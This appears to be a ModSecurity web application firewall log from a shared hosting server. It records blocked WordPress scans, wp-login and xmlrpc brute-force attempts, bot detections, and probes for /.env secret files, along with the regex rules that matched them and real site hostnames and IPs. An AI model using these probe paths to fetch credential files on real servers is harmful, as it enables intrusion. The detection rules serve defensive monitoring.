[Tue May 26 16:03:25.258109 2026] [security2:error] [pid 762634:tid 762823] [client 2.58.56.163:53107] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV29bx8rj1VZMqUAOeAkwAAADs"]
[Tue May 26 16:03:25.532706 2026] [security2:error] [pid 762634:tid 762871] [client 2.58.56.163:53152] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV29bx8rj1VZMqUAOeAmgAAAGs"]
[Tue May 26 16:03:25.810662 2026] [security2:error] [pid 762634:tid 762776] [client 2.58.56.163:53194] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahV29bx8rj1VZMqUAOeApAAAAAw"]
[Tue May 26 16:03:26.090720 2026] [security2:error] [pid 762634:tid 762866] [client 2.58.56.163:53246] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV29rx8rj1VZMqUAOeArgAAAGY"]
[Tue May 26 16:03:26.364495 2026] [security2:error] [pid 762634:tid 762766] [client 2.58.56.163:53322] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV29rx8rj1VZMqUAOeAuQAAAAI"]
[Tue May 26 16:03:26.636849 2026] [security2:error] [pid 762634:tid 762838] [client 2.58.56.163:53376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahV29rx8rj1VZMqUAOeAwgAAAEo"]
[Tue May 26 16:03:26.912436 2026] [security2:error] [pid 762634:tid 762875] [client 2.58.56.163:53403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV29rx8rj1VZMqUAOeAzQAAAG8"]
[Tue May 26 16:03:27.085611 2026] [security2:error] [pid 762634:tid 762773] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV29rx8rj1VZMqUAOeAxgAAAAk"]
[Tue May 26 16:03:27.185988 2026] [security2:error] [pid 762634:tid 762787] [client 2.58.56.163:53441] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahV297x8rj1VZMqUAOeA1QAAABc"]
[Tue May 26 16:03:29.200792 2026] [security2:error] [pid 762634:tid 762773] [client 192.109.200.101:58947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.200.109.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV2-bx8rj1VZMqUAOeBCQAAAAk"], referer: https://t.co/
[Tue May 26 16:03:29.297288 2026] [security2:error] [pid 762634:tid 762888] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2-Lx8rj1VZMqUAOeBBQAAAHw"]
[Tue May 26 16:03:29.501750 2026] [security2:error] [pid 762634:tid 762813] [client 192.109.200.101:60236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.200.109.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV2-bx8rj1VZMqUAOeBGQAAADE"]
[Tue May 26 16:03:31.306271 2026] [security2:error] [pid 762634:tid 762853] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2-rx8rj1VZMqUAOeBSAAAAFk"]
[Tue May 26 16:03:31.459980 2026] [security2:error] [pid 762634:tid 762697] [remote 52.167.144.170:18277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 170.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com"] [uri "/2013a-Anand.php"] [unique_id "ahV2-7x8rj1VZMqUAOeBUgAAUz4"]
[Tue May 26 16:03:31.777776 2026] [security2:error] [pid 762634:tid 762767] [client 192.109.200.101:60871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.200.109.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV2-7x8rj1VZMqUAOeBWwAAAAM"], referer: https://duckduckgo.com/
[Tue May 26 16:03:32.761868 2026] [security2:error] [pid 762634:tid 762769] [client 106.219.85.83:2435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_Lx8rj1VZMqUAOeBdgAAAAU"]
[Tue May 26 16:03:32.761973 2026] [security2:error] [pid 762634:tid 762769] [client 106.219.85.83:2435] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_Lx8rj1VZMqUAOeBdgAAAAU"]
[Tue May 26 16:03:33.834901 2026] [security2:error] [pid 762634:tid 762868] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2_bx8rj1VZMqUAOeBhAAAAGg"]
[Tue May 26 16:03:34.265706 2026] [security2:error] [pid 762634:tid 762765] [client 157.35.87.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2_bx8rj1VZMqUAOeBkgAAAAE"]
[Tue May 26 16:03:34.293255 2026] [security2:error] [pid 762634:tid 762828] [client 103.44.52.196:33416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_rx8rj1VZMqUAOeBoQAAAEA"]
[Tue May 26 16:03:34.293364 2026] [security2:error] [pid 762634:tid 762828] [client 103.44.52.196:33416] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_rx8rj1VZMqUAOeBoQAAAEA"]
[Tue May 26 16:03:35.009714 2026] [security2:error] [pid 762634:tid 762834] [client 103.153.130.62:58481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_7x8rj1VZMqUAOeBsAAAAEY"]
[Tue May 26 16:03:35.009855 2026] [security2:error] [pid 762634:tid 762834] [client 103.153.130.62:58481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2_7x8rj1VZMqUAOeBsAAAAEY"]
[Tue May 26 16:03:35.276756 2026] [security2:error] [pid 762634:tid 762769] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2_rx8rj1VZMqUAOeBrgAAAAU"]
[Tue May 26 16:03:36.950529 2026] [security2:error] [pid 762634:tid 762817] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3ALx8rj1VZMqUAOeB2AAAADU"]
[Tue May 26 16:03:39.045681 2026] [security2:error] [pid 762634:tid 762870] [client 72.14.178.148:39827] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "162.222.227.191"] [uri "/index.html"] [unique_id "ahV3A7x8rj1VZMqUAOeCFQAAAGo"]
[Tue May 26 16:03:39.616130 2026] [security2:error] [pid 762634:tid 762863] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3A7x8rj1VZMqUAOeCGAAAAGM"]
[Tue May 26 16:03:41.097887 2026] [security2:error] [pid 762634:tid 762878] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3BLx8rj1VZMqUAOeCQQAAAHI"]
[Tue May 26 16:03:42.226262 2026] [security2:error] [pid 762634:tid 762771] [client 104.28.68.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV3Brx8rj1VZMqUAOeCaQAAAAc"]
[Tue May 26 16:03:42.942991 2026] [security2:error] [pid 762634:tid 762849] [client 47.82.11.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV3Brx8rj1VZMqUAOeCggAAAFU"]
[Tue May 26 16:03:42.980870 2026] [security2:error] [pid 762634:tid 762862] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Brx8rj1VZMqUAOeCdwAAAGI"]
[Tue May 26 16:03:43.646770 2026] [security2:error] [pid 762634:tid 762852] [client 106.219.85.83:3716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3B7x8rj1VZMqUAOeCmwAAAFg"]
[Tue May 26 16:03:43.646883 2026] [security2:error] [pid 762634:tid 762852] [client 106.219.85.83:3716] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3B7x8rj1VZMqUAOeCmwAAAFg"]
[Tue May 26 16:03:44.684344 2026] [security2:error] [pid 762634:tid 762856] [client 103.44.52.196:45998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3CLx8rj1VZMqUAOeCsgAAAFw"]
[Tue May 26 16:03:44.684442 2026] [security2:error] [pid 762634:tid 762856] [client 103.44.52.196:45998] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3CLx8rj1VZMqUAOeCsgAAAFw"]
[Tue May 26 16:03:44.730702 2026] [security2:error] [pid 762634:tid 762750] [remote 13.203.52.35:45274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV3CLx8rj1VZMqUAOeCrgAAL3M"]
[Tue May 26 16:03:45.342371 2026] [security2:error] [pid 762634:tid 762890] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3CLx8rj1VZMqUAOeCuAAAAH4"]
[Tue May 26 16:03:45.454188 2026] [security2:error] [pid 762634:tid 762823] [client 103.153.130.62:58758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Cbx8rj1VZMqUAOeCxgAAADs"]
[Tue May 26 16:03:45.454490 2026] [security2:error] [pid 762634:tid 762823] [client 103.153.130.62:58758] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Cbx8rj1VZMqUAOeCxgAAADs"]
[Tue May 26 16:03:46.259676 2026] [security2:error] [pid 762634:tid 762640] [remote 152.53.111.131:49200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV3Crx8rj1VZMqUAOeC0gAASQU"]
[Tue May 26 16:03:46.940371 2026] [security2:error] [pid 762634:tid 762816] [client 114.119.131.206:40167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV3Crx8rj1VZMqUAOeC7QAAADQ"], referer: http://haddingtonwines.com/cart?remove_item=7109af321d970c64a0154000a60e65c8
[Tue May 26 16:03:47.358319 2026] [security2:error] [pid 762634:tid 762777] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3C7x8rj1VZMqUAOeC_gAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 16:03:47.673081 2026] [security2:error] [pid 762634:tid 762839] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3C7x8rj1VZMqUAOeC9gAAAEs"]
[Tue May 26 16:03:48.791091 2026] [security2:error] [pid 762634:tid 762864] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3DLx8rj1VZMqUAOeDGQAAAGQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1250034&moderation-hash=604e564c2a35717c597f39933a421fd5
[Tue May 26 16:03:49.772883 2026] [security2:error] [pid 762634:tid 762819] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Dbx8rj1VZMqUAOeDKAAAADc"]
[Tue May 26 16:03:50.150527 2026] [security2:error] [pid 762634:tid 762890] [client 130.51.21.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3Drx8rj1VZMqUAOeDPQAAAH4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:03:50.344634 2026] [autoindex:error] [pid 762634:tid 762861] [client 103.108.58.177:52534] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:03:51.862247 2026] [security2:error] [pid 762634:tid 762873] [client 130.51.21.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3D7x8rj1VZMqUAOeDbQAAAG0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1431423&moderation-hash=df9f0bd5964d6af8ea92cd6e61a99962
[Tue May 26 16:03:51.988223 2026] [security2:error] [pid 762634:tid 762870] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3D7x8rj1VZMqUAOeDZAAAAGo"]
[Tue May 26 16:03:52.985813 2026] [security2:error] [pid 762634:tid 762847] [client 207.241.173.85:24912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env"] [unique_id "ahV3ELx8rj1VZMqUAOeDjwAAAFM"]
[Tue May 26 16:03:53.297017 2026] [security2:error] [pid 762634:tid 762837] [client 207.241.173.85:24948] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/api/.env"] [unique_id "ahV3Ebx8rj1VZMqUAOeDnAAAAEk"]
[Tue May 26 16:03:53.297015 2026] [security2:error] [pid 762634:tid 762765] [client 207.241.173.85:24958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/backend/.env"] [unique_id "ahV3Ebx8rj1VZMqUAOeDnQAAAAE"]
[Tue May 26 16:03:53.397168 2026] [security2:error] [pid 762634:tid 762823] [client 207.241.173.85:24912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/app/.env"] [unique_id "ahV3Ebx8rj1VZMqUAOeDrwAAADs"]
[Tue May 26 16:03:54.079670 2026] [security2:error] [pid 762634:tid 762802] [client 106.219.85.83:11740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Erx8rj1VZMqUAOeDzQAAACY"]
[Tue May 26 16:03:54.079884 2026] [security2:error] [pid 762634:tid 762802] [client 106.219.85.83:11740] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Erx8rj1VZMqUAOeDzQAAACY"]
[Tue May 26 16:03:54.180148 2026] [security2:error] [pid 762634:tid 762843] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Ebx8rj1VZMqUAOeDxQAAAE8"]
[Tue May 26 16:03:55.594246 2026] [security2:error] [pid 762634:tid 762664] [remote 121.200.216.55:51864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahV3E7x8rj1VZMqUAOeD-QAACB0"]
[Tue May 26 16:03:55.623189 2026] [security2:error] [pid 762634:tid 762880] [client 142.250.32.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV3Erx8rj1VZMqUAOeD5wAAAHQ"]
[Tue May 26 16:03:55.673658 2026] [security2:error] [pid 762634:tid 762684] [remote 173.249.21.166:43308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV3E7x8rj1VZMqUAOeD_wAAHjE"]
[Tue May 26 16:03:55.675455 2026] [security2:error] [pid 762634:tid 762838] [client 62.60.130.233:56516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.kmmc.co.in"] [uri "/wp-login.php"] [unique_id "ahV3E7x8rj1VZMqUAOeEAQAAAEo"], referer: https://www.google.com/
[Tue May 26 16:03:55.864541 2026] [security2:error] [pid 762634:tid 762816] [client 103.153.130.62:59029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3E7x8rj1VZMqUAOeECAAAADQ"]
